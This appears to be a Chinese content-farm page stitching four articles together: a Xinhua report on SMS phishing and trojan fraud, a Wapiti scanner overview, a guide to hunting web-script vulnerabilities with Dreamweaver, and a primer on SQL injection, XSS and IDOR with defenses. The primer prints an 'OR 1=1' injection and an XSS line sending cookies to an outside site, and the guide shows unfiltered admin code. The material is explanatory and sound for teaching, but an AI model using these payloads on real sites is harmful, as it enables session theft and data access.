61阅读

网站安全漏洞扫描工具-冒充10086非法盗取近200万元——手机网络安全漏洞调查

发布时间:2017-12-25 所属栏目:历史悠久的英文

一 : 冒充10086非法盗取近200万元——手机网络安全漏洞调查

(图文互动)(1)冒充10086非法盗取近200万元——手机网络安全漏洞调查

  这是7月23日拍摄的在微信上传播的“测测你前世是什么人”应用程序。新华社记者 丁汀 摄

  

 

  “测测你前世是什么人”应用程序因存在恶意欺诈内容而被关闭(7月23日摄)。新华社记者 丁汀 摄

  新华网北京7月23日电(记者罗政、阳娜、魏董华)只因为点击了显示为“10086”发来的“积分兑换现金”的链接,浙江省湖州市民钱先生的银行卡里近8000元就被盗取了。近日,浙江警方破获的多起案例显示,通过短信等多种方式植入手机的木马程序和钓鱼链接,正威胁着用户的个人隐私和财产安全。

  “新华视点”记者调查发现,随着移动互联网的发展,手机网络安全事件正呈高发状态,除了冒充“10086”等伪基站短信发的链接,类似“测一测你的前世”等一些有趣的应用链接,也可能藏有盗取用户个人信息的木马程序。

  利用钓鱼链接获利数百万元

  浙江市民钱先生的手机不久前收到一条显示为“10086”的号码发来的信息:“你的手机积分可以换取270元钱,可以上网提现”,并附有网址链接。“点进去之后觉得页面很正规,就按提示输入了姓名、电话、农业银行卡号和密码,但提交之后就再无音信了。”钱先生随后去农业银行查询,发现卡里的7948元已全部被提走。

  据浙江警方介绍,钱先生的遭遇并非个案。在浙江警方查明的这起系列案件中,犯罪嫌疑人冒充中国移动客服10086,在浙江、重庆、江西、湖南、广西等多地通过伪基站向手机用户发送“10086积分兑换现金”活动的链接,非法盗取近200万元。在浙江警方破获的另外一起案件中,犯罪嫌疑人在不到一年多的时间里,利用短信等方式向受害人发送木马程序链接,尽管每位受害者的损失折合人民币只约1000元,但案件数量众多,犯罪嫌疑人总计诈骗或窃取至少250万元。

  浙江省公安厅网警总队总工程师蔡林介绍,利用钓鱼网站、木马APK程序侵害用户财产安全的案件不断发生。这类木马APK程序往往是通过短信链接、手机APP嵌入等方式进入手机系统。奇虎360旗下第三方漏洞响应平台“补天”公布的某手机钓鱼网站的后台里,有500多名受骗人的银行账号、手机号、姓名等个人信息,而且每天都以20至30条的速度更新。

  还有一类木马程序仅以骚扰用户为目的。北京某事业单位的刘先生告诉记者,他的手机总是收到一些奇奇怪怪的链接,要求他安装各类APK应用程序,有时还推送包含不健康内容的视频或图片,“删掉了又来”,严重影响手机的正常使用。在不得已更换新手机后的第一个月,刘先生又发现话费骤然增加,致电运营商客服才发现,他的手机号莫名开通了包括多款手机报在内的增值服务,加起来达100余元。

  专业人士表示,刘先生后来遇到的这种情况,很可能就是通常所说的“恶意吸费软件”,这也是目前最为普遍的移动安全问题之一。数据显示,在安卓智能手机终端快速增长的2013年,我国平均每天有27万人的安卓手机被恶意程序所感染,其中资费消耗和恶意扣费类程序的感染量最高,分别占到总量的52%和24%。“近年来,这类手机安全事件更是呈现高发态势。”蔡林说。

  查分APP、“测测前世”等竟是钓鱼链接

  记者调查发现,利用手机和移动互联网应用程序的漏洞,盗取用户信息乃至获利的案件,其手法也在不断翻新。

  --利用热点事件,集中发送钓鱼网站链接。比如,在高考结束后的一段时期,多地考生及家长收到了包含“高考查分APP”的短信链接;在A股市场备受关注的情况下,“查看明日涨停股”等信息频频出现在一些用户手机上。近期还有不法分子将木马程序植入“优衣库”视频在网络上传播。

  奇虎360手机安全研究团队负责人宋申雷告诉记者,很多这类APP实际就是一个木马,只要用户点击下载安装,它就会在手机后台“安营扎寨”,“这就好比在手机里安装了一双眼睛,你在手机上的操作几乎一览无余,短信验证通知、银行卡密码、支付宝密码等都有可能被窃取。”

  --利用用户猎奇心理,暗中盗取个人信息。有着5亿用户的微信,被用户认为相对安全私密。然而随着各种嵌入到微信平台中的应用程序越来越多,一些潜藏信息泄露风险的应用也逐渐增多。比如,“测测你的前世是什么人”等小应用程序就通过微信平台广泛传播。

  上海市微信用户郑先生说,出于好奇点开链接,测出自己前世是“老鸨”,觉得蛮好玩,还在微信朋友圈里面分享了。“尽管在登录页面时要求授权认证,当时也有些担心,但觉得微信上的应用应该没什么问题。”

  蔡林等专家认为,正是利用用户的猎奇心理和对平台的信任,一些包含木马的钓鱼网页才会具有强大的传播力,一些用户的信息正是通过所谓的授权认证而泄露。记者近日再点开类似链接发现,部分已经显示为“恶意链接”,被腾讯技术团队拦截。

  --入侵具有信誉的“安全APP”,获取用户信息。拥有数千万甚至超过1亿活跃用户的搜狗手机输入法、UC浏览器等手机应用,也会因为程序漏洞遭到恶意代码入侵。

  据专家介绍,用户在不安全的网络环境下点击“更新应用程序”,或者看到好看的“输入法皮肤”点击下载时,恶意木马就有可能趁机植入正常程序当中,不仅可以获取用户保存的个人资料,还可以通过提取用户敲击键盘的数据读取交易密码。“还有一些用户反映,手机某些应用会在不经用户允许、没有任何提示的情况下自动进行后台更新,这也留下了较为严重的安全隐患。”宋申雷说。

  移动APP存监测盲区,网络案件立案难

  上海二三四五网络科技有限公司董事长庞东升认为,在“互联网+”的时代,个人在网络世界的曝光度越来越高,也给了不法分子可乘之机,移动端的钓鱼、木马植入等问题频发,正在加剧用户信息泄露等安全隐患。宋申雷认为,现在人们的日常生活越来越依赖于手机等移动设备,移动网络安全隐患的影响并不比传统的网站小,应当引起更多的重视。

  据业内人士透露,尽管各类移动APP后台漏洞不断暴露,用户信息泄露、财产被窃取的案例也频频发生,但是由于网络空间没有地域概念,移动APP存在监测盲区,很多案件立案难。

  比如,在浙江警方破获的案件中,犯罪嫌疑人的作案地点遍及多个省市,嫌疑人团伙分布在吉林延边、福建龙岩、浙江金华等多地,作案对象甚至包括我国台湾地区的手机用户。“对此,还应进一步发挥国家信息安全漏洞共享平台的作用,强化第三方漏洞监测和公众监督机制,保证用户的个人信息和财产安全。”宋申雷说。

  专家认为,对于近5.6亿移动互联网用户来说,首先还应提高辨别能力,避免被恶意链接欺诈。“比如,要养成从正规网站登录的习惯,遇到要求输入手机号甚至银行卡等个人信息的手机网页时,需要提高警惕,对于需要用户‘授权并登录’的跳转页面,应多留一个心眼。”宋申雷说。

  蔡林表示,因流量不足而到处寻觅“免费WIFI”的手机用户,也要避免接入无需验证的公共WIFI。“黑客能够制造假冒的公共WIFI,监视并记录用户所有的操作信息,特别是盗取用户隐私信息及网银账户密码。普通用户很难区分接入网络的真假,但一旦连入‘黑网’,就有可能因信息泄露而蒙受巨大损失。”

  业内人士提醒,手机丢失后,应第一时间冻结与移动支付相关联的银行卡账号、支付宝账号等,“此外,也不要将自己的身份证扫描件存在移动终端上,以免被不法分子利用。”蔡林说。

二 : Wapiti 轻量级网页安全漏洞扫描工具

Wapiti是Web应用程序漏洞错误检查工具。它具有“暗箱操作”扫描,即它不关心Web应用程序的源代码,但它会扫描网页的部署,寻找使其能够注入数据的脚本和格式。它用于检测网页,看脚本是否脆弱的。
Wapiti是一个开源的安全测试工具,可用于Web应用程序漏洞扫描和安全检测,可到http://sourceforge.net/projects/wapiti/下载。

开发语言: Python
软件主页: http://www.ict-romulus.eu/web/wapiti/home
下载地址: http://sourceforge.net/projects/wapiti/

Wapiti是用Python编写的脚本,使用它需要Python的支持,也就是说要先安装好Python。

Wapiti执行的是“黑盒”方式的扫描,也就是说直接对网页进行扫描,而不需要扫描Web应用程序的源代码。Wapiti通过扫描网页的脚本和表单,查找可以注入数据的地方,Wapiti能检测以下漏洞:

功能和特点
文件处理错误(本地和远程打开文件,readfile ... )
数据库注入(PHP/JSP/ASP,SQL和XPath注入)
XSS(跨站点脚本)注入
LDAP注入
命令执行检测(eval(), system(), passtru()...)
CRLF注射入(HTTP响应,session固定... )
统计漏洞数量
成功袭击的细节
漏洞详细信息
提供解决漏洞的方法
HTML报告格式
XML报告格式

之所以把Wapiti称之为轻量级,是因为它的安全检测过程不需要依赖漏洞数据库,因此执行的速度会更快些。
Wapiti给我的感觉是“What a pity!”的意思,一个功能完整的Web应用,如果在安全方面有漏洞的话,就真的是“What a pity!”

三 : 网站后台脚本漏洞挖掘技巧,基于工具快速挖掘

以前写的文章,今天整理到的,这是以前搞脚本安全的一些经验,扔出来,当时靠 DW的确检测了很多脚本安全问题。
BY:乱雪

来源:0xx.org.cn

挖掘脚本漏洞和软件漏洞相比来说更容易一些,门槛也很低,不需要掌握汇编、系统原理等等高深知识,只需要掌握脚本,甚至没有编写过WEB程序,只要能看得懂代码,也就能挖得到洞。如果一个文件一个文件地去看代码,那太烦琐了,而且工程相当大,这里总结了几个以工具来挖掘的方法:

一、Dreamweaver

Dreamweave做网页是个好东西,挖漏洞更是个好东西,和其他程序比起,我更爱Dreamweaver,灵活运用它,可以更快地挖出脚本中的漏洞。

挖掘之前,先总结一下一般会出现漏洞的几个接受参数的函数:

ASP中的就找找Request....

PHP:$_POST、$_GET、$_REQUEST....

启动Dreamweaver,选择菜单栏上的“编辑”,选“查找和替换”,如图:

随便去下了个ASP程序,以它为例,挖个漏洞出来。

在“查找和替换”对话框中,把“查找范围”选成“文件夹…”,路径就是web程序的路径,然后在“查找”内容里填个request,点击“查找全部”,看结果如图:

接受来的参数都只过滤了空格,双击打开查看他们的源码,代码如下,很明显出现问题了:


Dim adminname,password,pass
adminname = Trim(Request("adminname")) '//这里没有过滤
password = Trim(Request("password")) '//这里也没过滤
pass = Trim(Request("pass"))
if password <> pass then
ReturnError("超作错误,两次密码输入不相同!")
end if
Sql="Select * From [admin] " '//数据库操作
Set Rs = Server.CreateObject("Adodb.Recordset")
Rs.Open Sql,Conn,1,3,1
If adminname <> "" Then Rs("adminname") = adminname
If password <> "" Then Rs("password") = md5(password)
Rs.Update
Rs.Close:Set Rs=Nothing
ReturnOK("修改管理帐号密码成功,下次登陆请用新帐号/密码进行登陆。")


PHP的方法也一样,只是查找的内容不一样而已。

二、PHP Bugscan

这个用起感觉一般吧:)

见此文:

下载地址:

三、Mscasi

这个是微软出的,针对ASP的,不过觉得此软件不怎么样,我扫了好几个有漏洞的都没扫出来,而且还是基于.NET的。

见此文:

下载地址:

http://www.microsoft.com/downloads/details.aspx?FamilyId=58A7C46E-A599-4FCB-9AB4-A4334146B6BA&displaylang=en

四、Php Vulnerability Analyzer

07年在杂志上看到介绍的,专门用于挖PHP程序中的漏洞的,好象挺不错的,但我没有用过,也是基于.NET环境的。

下载地址:

五、PHP X-CODE BUG SCAN

这个程序也不错,用来挖PHP中的漏洞的,推荐大家使用使用。

这里只详细介绍了Dreamweaver,其他程序都差不多的,就不一一介绍了。感觉还是Dreamweaver好用一些。希望能帮助大家:)

四 : 历史悠久的3个经典网站安全漏洞介绍

互联网项目里边,SQL注入漏洞、XSS漏洞和猜测URL攻击这三个漏洞可谓历史悠久,然而直到今天还有人不断中枪,也真是微醺。

这几个漏洞说大也大,说小也小。说大是说这些漏洞危害大,会导致数据层面的安全问题;说小是从技术层面上讲都是未对外部输入做处理导致的,想要做针对性地防范很简单。下面简单看看这些漏洞的原因及防范方法。

SQL注入

SQL注入之所以存在,主要是因为工程师将外部的输入直接嵌入到将要执行的SQL语句中了。黑客可以利用这一点执行SQL指令来达到自己目的。举例来说,有一个接受参数为id的页面,在接收到id后从数据库中查询相应的数据, 其代码大致如下:


string SQL = "SELECT * FROM [User] WHERE ID=" + Request["ID"];

​正常情况下,Request["ID"]为数字,这条SQL能很好地工作。如果我们认为修改Request["ID"],将其内容修改为?ID=1 OR 1=1 我们将得到这样一条SQL:


​SELECT * FROM [User] WHERE ID=1 OR 1=1

因为有OR的出现这条SQL语句已经可以获取User表中的任意信息。利用SQL注入漏洞,我们能够获取想要的信息,同时可以通过猜测-报错获取到数据库其它表的结构和信息,如果数据库、服务器权限设置不当,甚至有可能能获取到整个服务器的控制权限。

规避这种漏洞有很多种办法,以现代的编程语言来说,选择一个合适的ORM框架可以减少不少问题而且能大大提高开发效率。

如果因为某些原因需要继续写SQL语句,参数化查询也能解决这一问题。

对于需要拼接SQL语句的程序来说,注意两点也可以避免此问题。第一点是如果查询的字段类型是数字等类型,在拼接SQL前先判断输入是不是一个合法的数字,不合法则终止程序即可。第二点是如果字段类型是字符串,则记得将输入里的的单引号进行转义。

XSS攻击

如果说SQL注入是直接在SQL里执行了用户输入,那XSS攻击是在HTML里代码执行了用户输入。相对SQL注入,XSS似乎更能引起人关注。几年前新浪微博被人利用XSS获取大量粉丝;3DM也曾经被植入script代码对另一个游戏网站进行了惨无人道的DDOS攻击。

这里还是用SQL注入中的例子来说,假设页面输出为:


​<div><%= Request["ID"] %></div>

这里我们可以在Request["ID"]里传入一段编码后的脚本,在最终输出的时候,就变成了一段可执行的javascript代码。



<script>window.location.href='anothersite.com?cookie=' + document.cookie;</script>

这段代码获取到当前页面的cookie值,并将cookie值传递到另一个名为anothersite.com的网站。利用这种模式,黑客可以获取到用户的登录信息或者将用户跳转到钓鱼网站来达成自己的目的。

XSS攻击也可以简单分为两种,一种是上述例子中利用url引诱客户点击来实现;另一种是通过存储到数据库,在其它用户获取相关信息时来执行脚本。

防范XSS攻击需要在所有的字段都对输入的字符串进行html encode(或者在输出时进行encode)。如果需要使用富文本编辑的,可以考虑使用UBB。

猜测URL攻击

猜测URL攻击是通过已知的GET、POST参数来猜测未公开的参数并尝试进行攻击。

以Request["ID"]为例,如果ID为1是合法的可访问的数据,可以通过尝试ID=2,ID=3等一系列来尝试是否对其它资源有访问、修改权限。如果控制不当,则可以轻松获得并修改数据。

要避免这种问题,方案一是使用较长的无规律的数字、字符来做为ID,增大猜测难度;对于需要登录的程序,可以判断用户身份是否有对应ID数据的访问、修改权限;如果ID已经是自增类型且不需要登录,可以用过在URL里增加无规律的校验字段来避免。

其它需要注意的地方

安全是一个系统工程。

要提高系统安全性,最首要的一点是不要相信任何输入!不要相信任何输入!不要相信任何输入!重要的事情说三遍。这里的输入除了URL里的GET参数、POST参数,还包括COOKIE、Header等可以进行修改的各类信息。

在程序设置方面,不输出客户不需要知道的各类信息,如原始的异常信息、异常附近的代码段等等,这样也能增加不少安全性。

最后,在测试或系统运行的过程中,可以使用类似appscan这样的安全检测工具来检查程序是否有漏洞。

本文标题:网站安全漏洞扫描工具-冒充10086非法盗取近200万元——手机网络安全漏洞调查
本文地址: http://www.61k.com/1144525.html

61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1